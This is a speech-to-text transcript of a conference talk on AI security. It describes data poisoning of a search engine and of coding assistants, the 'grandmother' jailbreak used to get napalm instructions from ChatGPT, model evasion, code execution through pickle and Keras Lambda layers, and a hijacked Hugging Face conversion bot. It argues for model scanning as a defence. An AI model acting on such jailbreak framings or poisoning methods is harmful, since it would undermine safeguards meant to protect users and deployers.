
all right so if you were here for the last talk this is actually a great followup for that I'm going to scare you with how dangerous AI can be um so my name is CLA Weissman I work for hidden layer which is a startup we do security for AI which hopefully will become clear kind of what that is later on in my presentation um yeah so let's begin all right so first off I'm just going to kind of go over uh an outline of what I'm going to talk about today so first I'm going to go over what adversarial AI is hopefully as Security Professionals you at least have heard this term but we'll go to go over it
some current dangers what pre-trained models are some specific AI threats some alternative options uh kind of what existing workflows about using AI machine learning in companies look like today what our current state of security is and moving forward introducing uh model scanning which hopefully you've heard of before but kind of that as in level of tooling so first off adversarial AI uh adversarial AI is put in the most simplest of terms is a type of attack in order to force your a force an AI model to either make a mistake or a misclassification and so this can be as benign as having an image of a dog be classified as a cat which doesn't seem
all that harmful to actually having something like a self-driving car not be able to recognize a stop sign um I don't probably need to impress upon you how dangerous that could be um but so you can imagine all of the different issues this could cause and I'm sure you've seen examples of this in the news whether or not it was classified as adversarial AI so first I'm going to go over some of the dangers hopefully you've seen some of these examples I'll pull up and if not um we'll get ready so this first one is an example of data poisoning um this was actually not intentional data poisoning but there was a long running joke on the internet about how Australia
didn't actually exist and Microsoft's Bing unfortunately ingested some of this information as training data and so there was a period of time where if you looked up um if Australia exist according to Bing search results it did not obviously this is pretty funny we all know Australia exists so this isn't all that harmful but of course this is relatively damaging to a company um that is supposed to be providing you know good information as a uh search engine the second one is also data poisoning um which was you were able to poison this attack was poisoning data such that um AI assistants or co-pilots and chat Bots were able to suggest malicious code obviously there's malicious code on the
internet but ideally you know we'd rather not have chat Bots helping out with that um this next one is a prompt injection attack um this is chat GPT um many of you have probably seen examples of this but uh if you ask chat GPT directly how to make Napalm it will not tell you um but in previous versions of chat G gbt if you use this type of prompt injection which was acting the chat bot to act as your grandmother who was a chemical engineer who would used to tell you about Napalm um it would tell you how to make Napal again yes this information is available on the internet but especially in terms of
company ethics and uh values this is not really something you would want something embedded in your company to be able to tell someone and a lot of chat Bots that you see on the internet today are their backend is using chat GPT and this last one um is if you're in the security space you probably know about this attack uh it was named silance I kill you it happened in 2019 very close to home for the company I work for it actually was the precipitous of our startup um it was a model evasion attack silance was using AI to actually secure other things um which is AI security slightly different um but a threat actor
was able to use re-engine or re-engineer some API end points and was able to completely bypass the model at the end of their attack and this attack was going on for I want to say it was like 60 to 90 days and it was not known about until it was published that they had attacked silence obviously this was extremely serious um and again this happened in 2019 so these threats have become very on the Forefront recently but this has been happening for quite a while and lastly one of the even more fun dangers is not only is our AI very vulnerable um AI is also being used as another tool in uh for threat actors and
obviously if you're a company and you're you have a chat bot or you're supporting a chat pot you don't actually really want it to be used to help attack yourself um so you know Microsoft and open AI were presenting about or uh wrote an article about that so you can continue to see that as well all right so hope hopefully you all know why this matters but if you're not as much in the AI space um you might see chat gbt as kind of a fun thing to interact with but not a super serious uh thing to be in production and things like that it's you know fun to ask questions too but am I
really you know using it for massive parts of my job all right so by 2026 more than 80% of Enterprises will have used generative artificial intelligence application programming interfaces models or deployed geni enabled applications in production environments up from less than 5% in 2023 so obviously we're in 20124 at this point so we're at higher than 5% um and this is just talking about gen AI so that's when you think of things like llms chatbots co-pilots um this is not talking about lower level machine learning models as well and So currently right now uh most companies have about 1,500 machine learning models in production in their company and uh through the work with partners and
talking with a lot of people in um the space we've been in um it's actually found out that a lot of companies don't know how many machine learning models they have deployed um which is obviously very concerning how are you supposed to protect something if you don't even know where it is or if you have
it come on there we go so now I want to talk about pre-trained models so everyone probably knows kind of what a chatbot is in general um but when you're in acting with a machine learning model or an AI model you're interacting with a pre-trained model so it's already been fine-tuned it's already been trained on usually a massive data set for a specific task for instance chat gbt the specific task is to like respond to your questions and to produce the best output based on what the input was so what is the threat with that I mean we've heard about prompt injections from the previous speaker I'll talk a little bit about that the threat is
actually much larger than that so machine learning models are often serialized um which is very easy to hide malicious code in serializations this is not a new machine learning problem this is something we've known about but it's just be it's come up again um given what I talked about with pre-trained models they're often huge um and so whether you're passing them in between people at your company or they're being uploaded to places like hugging face which is a model repository um they're usually serialized because they're just unmanageably large each AI or ml framework has its own unique vulnerabilities we have things like serialization vulnerabilities that kind of apply across the board but each individual framework has its own method of doing
things and then their own issues so there's no one solution fits all and at the end of the day I probably don't need to tell you all this but Ai and ml models are code so any vulnerabilities that you can expect when you're just doing a regular program um apply to machine learning models which I think is sometimes lost when you're interacting with something past
production all right so I want to talk us about some specific model threats so here I'm going to talk about three very popular machine learning Frameworks in Python um so first off Caris uh and all of these are great Frameworks if you want to um research them some more Caris allows for code execution in Lambda layers so Lambda layers are the special feature that Caris allows so you can add bespoke Expressions to your machine learning model to specifically tailor them um this is a feature of Caris that they have intentionally implemented for that methodology um unfortunately though arbitrary Expressions allows for arbitrary code execution as well um and in the way that these layers are
serialized it's harder to catch tensor flow allows for exfiltration code execution and directory traversal in the way that they store their tensors and P torch allows for code execution and like like I said again these are not esoteric libraries that you know data scientists are tinkering with on their own these are the like main Frameworks that if you find a machine learning model it's probably in one of these three and if you go on hugging face most of them are in one of these three so now I want to talk about pickle serialization so probably all of you have heard about pickle serialization it's a very very common serialization method in Python um so is pickle
serialization safe um so I asked this question to chat GPT I was curious what it would say um and pretty much resounding the answer is no so not only um is you know serialization has its issues the way that pickle serial serializes files it's possible to inject code that will be executed upon deserializing deserializing or unpickling as their term the file so that doesn't even start to talk about is the file itself dangerous just o trying to unpickle it before you can even look at it you're opening yourself up to pretty serious vulnerabilities um if you go and look at the official pickle documentation on python they also tell you this they tell you you know don't
open pickle files if you don't know where they've been things like that obviously this is you know that's green fields and we would all love to always know the origin of every file we open but unfortunately especially with data files This Is Not always completely possible so you know I've hopefully scared you a little bit um so are there alternative options to these issues and well a little bit so in response to security concerns hugging face which is a huge model repository created a new format called safe tensor and um this was very exciting for anyone in the machine learning World hugging face is really the main player on the stage for storing machine learning models if you go on
there you can find chat gbt you can find llama all of these main things are stored there and just like GitHub individual contributors have their own things their own spin on things all of that so hugging face implemented an ability to convert current pie torch tensors to to save tensor format on their website so you didn't have to you know download a new library redo the saving of your model anything like that so this sounds great you know ease for everyone involved in theory unfortunately that was not so much um the converter and service bot that hugging face implemented was actually able to be hijacked so you were able to upload a machine learning model with
some certain malicious code that was able to impersonate the service bot and create poll requests for any model on hugging face with malicious code in these poll requests obviously the person who owned the model would need to accept these pull requests but all of these files are serialized so if you were to look at the diffs of the two files in the pull requests you would not be able to tell that it was malicious code and given that it was a service bot from hugging face you're more likely to trust it and accept the pull request given that it would have probably been labeled something like safe tensor update safe tensor patch anything like that so
that's pretty concerning and an unfortunate reality to you know there is not a one fix and this was also only a solution for p torch tensors this wasn't a solution to any of the other formats out there so now I want to talk a little bit about you know what are some of our existing workflows um with machine learning so I'm just curious like how many people here have actually coded a machine learning model or like seen the code of a machine learning model okay right so it's not that many people this is this is not something that's super prevalent in the security space right now I mean securing them is for sure but so kind of the common existing workflows
is these are things being deployed by data scientists and software Engineers um and before this happens it's kind of a manner of things maybe you're making the model completely from scratch by yourself but probably not you're probably using resources on the internet you're potentially even downloading a model from hugging face which is very understandable um why break or try to fix models when there's already really good ones out there so generally they're uploaded to potentially a vulnerable server with very little Authentication and lastly AI is just being used in general by employees to automate work whether this is you have to write an email to your boss and you want to sound a little bit more official so you plug
it into chat GPT or you're using GitHub co-pilot to help suggest code for you and for those of you who use GitHub co-pilot how how much do you read the lines it suggests maybe you see that they're trash and you throw them away but are you like line by line expression by expression checking what your coding probably not um I'm certainly not um and you know I'm in this security space so and this is the last bill Point especially this is kind of unchecked we you know companies might be putting out things like please don't use chat gbt it's again against our company policies but in the reality it's happening everywhere it's in our emails it's in
social media it's in browsers it's on your bank website in your chat bot we can't get away from it
all right so what's our current state of security so most current cybercity Solutions are not specific for machine learning um this is hopefully not news to anybody but so there are a lot of great cyber Security Solutions out here for protecting all manner of things in the tech space um and there are certain machine learning attacks that potentially could be caught through this but it's not it's not a complete fix all there's specific parts of code specific attacks that we don't protect against there are a lot of organizations like miter Atlas or OAS that are specific specifically focused on identifying attacks rather than preventing while this is extremely important it's not as important to know
what the attack was after it happened I think we would all much rather have prevented it in the first place and know where the vulnerabilities are before threat actors found them and as a general statement this is not true across the board but machine learning models are nether checked before entering a company workflow or routinely checked once they've entered company usage um so this is also a big one of this is kind of a multi-pronged problem not only are we dealing with the issue of there could be vulnerabilities in your original machine learning code there could be malware in your original machine learning code there can be malware in your data um but there you
might put up a completely you know safe model at the time and over time through data poisoning or through intentional malware attacks your model is no longer safe um and there is really just kind of a lack of of checking in that sense so hopefully I scared you slightly or a lot um so what does that mean for moving forward um what does that mean about changing the space I mean we've heard all about how much AI is changing we've heard specifically from the Biden Administration about handing down specific Securities but how do we actually Implement that there aren't specific tools um or a plethora of specific tools so model scanning at every level and obviously this is not a
simple solution I talked about with each framework has individual things and even just typing machine learning files is not a simple problem um but there needs to be model scanning at every level specific by specific scanning all right so this is kind of the proposed idea is so in terms of when you're designing a model there needs to be direct communication and documentation about what is the Providence of this model is it made completely in house what libraries are being used everything with that and a conscious awareness of security vulnerabilities in these models the what we talked about with the vulnerabilities in tensorflow and Caris and pytorch a lot of these vulnerabilities come from specific
features that these models have so you can't just you know blank it across I'm just not going to use any code that has any known vulnerabilities it's probably not possible um and that these are just the vulnerabilities we know right now so in predeployment again scanning again anytime this model changes hands it's being scanned the data is being scanned and lastly post- deployment a continuous scanning of this model and also a monitoring of what is happening with this model so who has access to this model who is inputting to this model and where is this model living within the company workspace um um if you've seen any fun prompt injection attacks on like chat bots on Bank
websites often times these chat Bots they're may be there just to help you get to the right person in the company to ask for help but they often can spit out information like their training data um their Executives potential account information so even if you haven't given specific information or you've put guard rails on things like chatbots they potentially have access to more information than you realize all right so again hopefully I scared you a little bit and educated you on kind of what machine learning and AI look like in the security space um yeah does anyone have any questions way over in the back what does it mean to scan modelis yeah exactly I sorry I should
have mentioned that but so yeah scanning a model like I said with pickle serialization obviously this needs to be some sort of static analysis um you can't open it so basically needs to be like a bite by bite scan so we can fully understand what's in this model but we can't open it before we have any understanding of
that yeah exactly so
yeah Al no there is not an alternative alternative that is safe that is um there are some other serialization options but all of them just have different problems HD or hdfs is another serialization um Onyx um allows you to save your models in a slightly different way but at the end of the day no there is not a solution what gives the SC the conflict to determine whether it's a good file or a badile yeah so at least for the case for my company we have specific um malware that we have identified as unsafe um so there's kind of different levels there's specific malware that we are looking for whether that's certain libraries or certain code and then
there's also just general things we're looking for that we know are easy to exploit so there's kind of the the two levels of your model is unsafe it's been attacked and your model has security vulnerabilities and that's all through like specific research that we've done that we found inside the model before um that you can obate the data so that when you're scan before you deriz it that the we haven't run into issues with that specifically um do you mean that it would be obus obus in a way that we wouldn't be able to detect something was unsafe yeah because you're scanning it you're scanning the calized data right and so like obious in a way that once calized
right and and the malicious content is there but you're scanning it so you may not see it we haven't come across that with the way we're I don't want to say opening pickle files CU that's not the correct term but we are doing a static scan of the deserialized data are safer ways to Der um probably the best answer would be open your files in a sandbox don't open them on your your uh your own computer um but again no not in general not really all right well thank you all so much [Applause]